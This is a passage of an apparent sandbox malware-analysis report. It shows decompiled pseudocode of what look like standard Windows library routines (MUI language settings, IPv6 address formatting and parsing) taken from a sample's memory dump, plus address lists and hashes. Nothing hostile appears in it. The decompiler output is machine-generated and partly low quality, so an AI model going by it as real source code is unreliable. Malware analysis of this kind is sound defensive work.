					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00878460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0085E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0087718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00878460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0085E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0087718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00878460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00878460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00878460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0085E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0085E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0087718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0085E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00852340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0086E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0085E2A8(_t322,  &_v68, _v16);
								if(E00875553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0086E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0085E2A8(_t322,  &_v68, _t236);
								if(E00875553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0085E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0085E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0087718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0085E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00852340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0086E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0085E2A8(_v12,  &_v68, _v16);
							if(E00875553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0086E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0085E2A8(_t322,  &_v68, _t269);
							if(E00875553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0085E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0085E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0087718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0085E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00852340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0086E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0085E2A8(_v12,  &_v68, _v16);
						if(E00875553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0086E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0085E2A8(_t322,  &_v68, _t296);
						if(E00875553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0085E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0085E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                0x00878788
                                                0x00878788
                                                0x00878791
                                                0x00878794
                                                0x00878798
                                                0x0087879b
                                                0x0087879e
                                                0x008787a1
                                                0x008787a4
                                                0x008787a7
                                                0x008787aa
                                                0x008787af
                                                0x008c1ad3
                                                0x00878b0a
                                                0x00878b0d
                                                0x00878b13
                                                0x00878b19
                                                0x00878b1f
                                                0x00878b25
                                                0x00878b2b
                                                0x00878b31
                                                0x00878b37
                                                0x00878b3d
                                                0x00878b46
                                                0x00878b46
                                                0x008787c6
                                                0x008787d0
                                                0x008c1ae0
                                                0x008c1ae6
                                                0x008c1af8
                                                0x008c1af8
                                                0x008c1afd
                                                0x008c1afe
                                                0x008c1b01
                                                0x008c1b06
                                                0x008c1b06
                                                0x008787d6
                                                0x008787f2
                                                0x008787f7
                                                0x00878807
                                                0x0087880a
                                                0x0087880f
                                                0x00878810
                                                0x00878813
                                                0x00878818
                                                0x00878818
                                                0x0087882c
                                                0x00878831
                                                0x00878838
                                                0x00878908
                                                0x00878920
                                                0x008789f0
                                                0x00878a08
                                                0x00878af6
                                                0x00878af6
                                                0x00878af8
                                                0x00878afb
                                                0x008c1beb
                                                0x008c1beb
                                                0x00878b04
                                                0x008c1bf8
                                                0x008c1c0e
                                                0x008c1c13
                                                0x008c1c16
                                                0x008c1c16
                                                0x008c1bf8
                                                0x00000000
                                                0x00878b04
                                                0x00878a0e
                                                0x00878a11
                                                0x00878a14
                                                0x00878a15
                                                0x00878a18
                                                0x00878a22
                                                0x00878b59
                                                0x00878a28
                                                0x00878a3c
                                                0x00878a3c
                                                0x00878a42
                                                0x008c1bb0
                                                0x008c1b11
                                                0x008c1b11
                                                0x00000000
                                                0x00878a48
                                                0x00878a51
                                                0x00878a5b
                                                0x00878a5e
                                                0x00878a61
                                                0x00878a69
                                                0x00878a69
                                                0x00878a6d
                                                0x00000000
                                                0x00000000
                                                0x00878a74
                                                0x00878a7c
                                                0x00878a7d
                                                0x00878a91
                                                0x00878a93
                                                0x00878a93
                                                0x00878a98
                                                0x00878a9b
                                                0x00878aa1
                                                0x00878aa1
                                                0x00878aa4
                                                0x00878aaa
                                                0x00878ab1
                                                0x00878ac5
                                                0x00878ac7
                                                0x00878ac7
                                                0x00878ac5
                                                0x00878ace
                                                0x008c1bc9
                                                0x008c1bce
                                                0x008c1bd2
                                                0x008c1bd2
                                                0x00878ad8
                                                0x00878aeb
                                                0x00878aeb
                                                0x00878af0
                                                0x00878af4
                                                0x00000000
                                                0x00878af4
                                                0x00878a42
                                                0x00878926
                                                0x00878929
                                                0x0087892c
                                                0x0087892d
                                                0x00878930
                                                0x00878935
                                                0x0087893a
                                                0x00878b51
                                                0x00878940
                                                0x00878954
                                                0x00878954
                                                0x0087895a
                                                0x008c1b63
                                                0x00000000
                                                0x00878960
                                                0x00878969
                                                0x00878973
                                                0x00878976
                                                0x00878979
                                                0x0087897e
                                                0x00878981
                                                0x00878981
                                                0x00878986
                                                0x00000000
                                                0x00000000
                                                0x008c1b6e
                                                0x008c1b74
                                                0x008c1b7b
                                                0x008c1b8f
                                                0x008c1b91
                                                0x008c1b91
                                                0x008c1b99
                                                0x008c1b9c
                                                0x008c1ba2
                                                0x008c1ba2
                                                0x0087898c
                                                0x00878992
                                                0x00878999
                                                0x008789ad
                                                0x008c1ba8
                                                0x008c1ba8
                                                0x008789ad
                                                0x008789b6
                                                0x008789c8
                                                0x008789cd
                                                0x008789d0
                                                0x008789d0
                                                0x008789d6
                                                0x008789e8
                                                0x008789e8
                                                0x008789ed
                                                0x00000000
                                                0x008789ed
                                                0x0087895a
                                                0x0087883e
                                                0x00878841
                                                0x00878844
                                                0x00878845
                                                0x00878848
                                                0x0087884d
                                                0x00878852
                                                0x00878b49
                                                0x00878858
                                                0x0087886c
                                                0x0087886c
                                                0x00878872
                                                0x008c1b0e
                                                0x00000000
                                                0x00878878
                                                0x00878881
                                                0x0087888b
                                                0x0087888e
                                                0x00878891
                                                0x00878896
                                                0x00878899
                                                0x00878899
                                                0x0087889e
                                                0x00000000
                                                0x00000000
                                                0x008c1b21
                                                0x008c1b27
                                                0x008c1b2e
                                                0x008c1b42
                                                0x008c1b44
                                                0x008c1b44
                                                0x008c1b4c
                                                0x008c1b4f
                                                0x008c1b55
                                                0x008c1b55
                                                0x008788a4
                                                0x008788aa
                                                0x008788b1
                                                0x008788c5
                                                0x008c1b5b
                                                0x008c1b5b
                                                0x008788c5
                                                0x008788ce
                                                0x008788e0
                                                0x008788e5
                                                0x008788e8
                                                0x008788e8
                                                0x008788ee
                                                0x00878900
                                                0x00878900
                                                0x00878905
                                                0x00000000
                                                0x00878905

                                                APIs
                                                Strings
                                                • Kernel-MUI-Language-SKU, xrefs: 008789FC
                                                • Kernel-MUI-Language-Disallowed, xrefs: 00878914
                                                • Kernel-MUI-Number-Allowed, xrefs: 008787E6
                                                • WindowsExcludedProcs, xrefs: 008787C1
                                                • Kernel-MUI-Language-Allowed, xrefs: 00878827
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: _wcspbrk
                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                • API String ID: 402402107-258546922
                                                • Opcode ID: c5a51142370d0434135fa3b376826fdf8b195fd2200aaa80b8763934b98a8a23
                                                • Instruction ID: 1c6edd887fdcd274270d59fabc44af375c0b1263074298959232ef17e080710c
                                                • Opcode Fuzzy Hash: c5a51142370d0434135fa3b376826fdf8b195fd2200aaa80b8763934b98a8a23
                                                • Instruction Fuzzy Hash: 30F1E4B2D00209EFCF15DF98C985AAEBBB9FB08304F14846AE505E7251EB34DA45DB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008913CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 38%
                                                			E008913CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00887707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x852926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00887707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x859cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00887707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00887707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00887707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00887707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                0x008913d5
                                                0x008913d9
                                                0x008913dc
                                                0x008913de
                                                0x008913e1
                                                0x008913e8
                                                0x008913ee
                                                0x008be8fd
                                                0x00000000
                                                0x008be921
                                                0x008be921
                                                0x008be928
                                                0x008be982
                                                0x008be98a
                                                0x00000000
                                                0x008be99a
                                                0x008be99e
                                                0x008be9a3
                                                0x008be9a8
                                                0x008be9b9
                                                0x008be978
                                                0x00000000
                                                0x008be978
                                                0x008be98a
                                                0x008be92a
                                                0x008be931
                                                0x008be944
                                                0x008be944
                                                0x008be950
                                                0x008be954
                                                0x008be959
                                                0x008be95e
                                                0x008be963
                                                0x008be970
                                                0x00000000
                                                0x008be975
                                                0x008be93b
                                                0x008be980
                                                0x00000000
                                                0x008be980
                                                0x008be942
                                                0x008be94b
                                                0x00000000
                                                0x008be94b
                                                0x00000000
                                                0x008be942
                                                0x008913f4
                                                0x008913f4
                                                0x008913f9
                                                0x008913fc
                                                0x008913ff
                                                0x00891406
                                                0x008be9cc
                                                0x008be9d2
                                                0x008be9d2
                                                0x008be9cc
                                                0x0089140c
                                                0x00891411
                                                0x00891431
                                                0x0089143a
                                                0x0089143c
                                                0x0089143f
                                                0x0089143f
                                                0x00891442
                                                0x00891447
                                                0x008914a8
                                                0x008914ac
                                                0x008be9e2
                                                0x008be9e7
                                                0x008be9ec
                                                0x008bea05
                                                0x008bea05
                                                0x00000000
                                                0x00891449
                                                0x00000000
                                                0x00891449
                                                0x0089144c
                                                0x00891459
                                                0x00891462
                                                0x00891469
                                                0x0089146a
                                                0x00891470
                                                0x00891473
                                                0x00891476
                                                0x00891476
                                                0x00891490
                                                0x00891495
                                                0x0089138e
                                                0x00891390
                                                0x00891397
                                                0x00891398
                                                0x00891399
                                                0x008913a1
                                                0x008913a4
                                                0x008913a4
                                                0x00891498
                                                0x0089149c
                                                0x0089149f
                                                0x008914a2
                                                0x00000000
                                                0x00000000
                                                0x008914a4
                                                0x00000000
                                                0x008914a4
                                                0x00891413
                                                0x00891415
                                                0x00891416
                                                0x00891419
                                                0x0089141c
                                                0x00891422
                                                0x008913b7
                                                0x008913bc
                                                0x008913bf
                                                0x008913bf
                                                0x008913c2
                                                0x00891424
                                                0x00891424
                                                0x00891424
                                                0x00891427
                                                0x0089142b
                                                0x0089142c
                                                0x0089142c
                                                0x0089142c
                                                0x00000000
                                                0x0089141c
                                                0x00891411

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                • Associated: 00000005.00000002.519635866.0000000000830000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520478568.0000000000920000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520485937.0000000000930000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520500667.0000000000934000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520512267.0000000000937000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520521318.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.520592219.00000000009A0000.00000040.00000001.sdmp Download File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_830000_Pcportk28.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: c1f18d67f22890b000c5159bb32cb89c8a30272cf68ace887042199bec8d9b2a
                                                • Instruction ID: a6fe69c3a6269f7ec4c6c29c1ca7d135ab1b205ff04bb15633e075aff73f63ab
                                                • Opcode Fuzzy Hash: c1f18d67f22890b000c5159bb32cb89c8a30272cf68ace887042199bec8d9b2a
                                                • Instruction Fuzzy Hash: 6F612771908656AACF24EF5DC8848BEBBB6FF94301718C02DE4D6C7741D634AA44DB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00890B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00890B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00868980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							L0085DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00890CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00890CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E008906BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E008906BA(_t135, _t178) == 0 || E00890A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00890CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00890CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E008906BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E008906BA(_t124, _t142) == 0 || E00890A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                0x00890b21
                                                0x00890b24
                                                0x00890b27
                                                0x00890b2a
                                                0x00890b2d
                                                0x00890b30
                                                0x00890b33
                                                0x00890b36
                                                0x00890b39
                                                0x00890b3e
                                                0x00890c65
                                                0x00890c68
                                                0x00890c6a
                                                0x00890c6f
                                                0x008beb42
                                                0x00000000
                                                0x00000000
                                                0x008beb48
                                                0x008beb48
                                                0x00890c75
                                                0x00890c7a
                                                0x008beb54
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x008beb5a
                                                0x00890c80
                                                0x00890c84
                                                0x008beb98
                                                0x00000000
                                                0x00000000
                                                0x008beba6
                                                0x00890cb8
                                                0x00890cba
                                                0x00890cd3
                                                0x00890cda
                                                0x00890ce4
                                                0x00890ce9
                                                0x00000000
                                                0x00890cec
                                                0x00890c8c
                                                0x008beb63
                                                0x00000000
                                                0x00000000
                                                0x008beb70
                                                0x008beb75
                                                0x008beb7d
                                                0x00000000
                                                0x00000000
                                                0x008beb8c
                                                0x00000000
                                                0x008beb8c
                                                0x00890c96
                                                0x00000000
                                                0x00000000
                                                0x00890ca2
                                                0x00890cac
                                                0x00890cb4
                                                0x00000000
                                                0x00000000
                                                0x00890b44
                                                0x00890b47
                                                0x00890b49
                                                0x00000000
                                                0x00000000
                                                0x00890b4f
                                                0x00890b50
                                                0x00000000
                                                0x00000000
                                                0x00890b56
                                                0x00890b62
                                                0x00890b7c
                                                0x00890bac
                                                0x00890a0f
                                                0x008beaaa
                                                0x00000000
                                                0x008beac4
                                                0x008beac4
                                                0x00890bd0
                                                0x00890bd0
                                                0x00890bd4
                                                0x00890bd9
                                                0x00000000
                                                0x00000000
                                                0x00890bdb
                                                0x00890be0
                                                0x008beb0e
                                                0x00890a1a
                                                0x00000000
                                                0x00890a1a
                                                0x008beb1a
                                                0x008beb1f
                                                0x008beb27
                                                0x00000000
                                                0x00000000
                                                0x008beb36
                                                0x00000000
                                                0x008beb36
                                                0x00890bea
                                                0x00000000
                                                0x00000000
                                                0x00890bf6
                                                0x00890c00
                                                0x00890c03
                                                0x00890c0b
                                                0x00000000
                                                0x00890c0b
                                                0x008beaaa
                                                0x00000000
                                                0x00890a15
                                                0x00890bb6
                                                0x00000000
                                                0x00890bc6
                                                0x00890bc6
                                                0x00890bcb
                                                0x00890c15
                                                0x00000000
                                                0x00000000
                                                0x00890c1d
                                                0x00890c20
                                                0x00890c21
                                                0x00890c24
                                                0x00890c24
                                                0x00890c26
                                                0x00000000
                                                0x00890c26
                                                0x00890bcd
                                                0x00000000
                                                0x00890bcd
                                                0x00890b89
                                                0x00890b89
                                                0x00890b90
                                                0x00000000
                                                0x00000000
                                                0x00890b96
                                                0x00000000
                                                0x00890b96
                                                0x00890a04
                                                0x00890a04
                                                0x00890b9a
                                                0x00890b9a
                                                0x00890b9b
                                                0x00890b9f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00890ba5
                                                0x00890ac7
                                                0x00890aca
                                                0x008beacf
                                                0x00000000
                                                0x008beade
                                                0x008beade
                                                0x008beae3
                                                0x00000000
                                                0x00000000
                                                0x008beaf3
                                                0x008beaf6
                                                0x008beaf7
                                                0x008beafe
                                                0x008beb01
                                                0x00000000
                                                0x008beb01
                                                0x008beacf
                                                0x00890ad0
                                                0x00890ad4
                                                0x00000000
                                                0x00000000
                                                0x00890ada
                                                0x00890ae6
                                                0x00890c34
                                                0x00000000
                                                0x00890c47
                                                0x00890c49
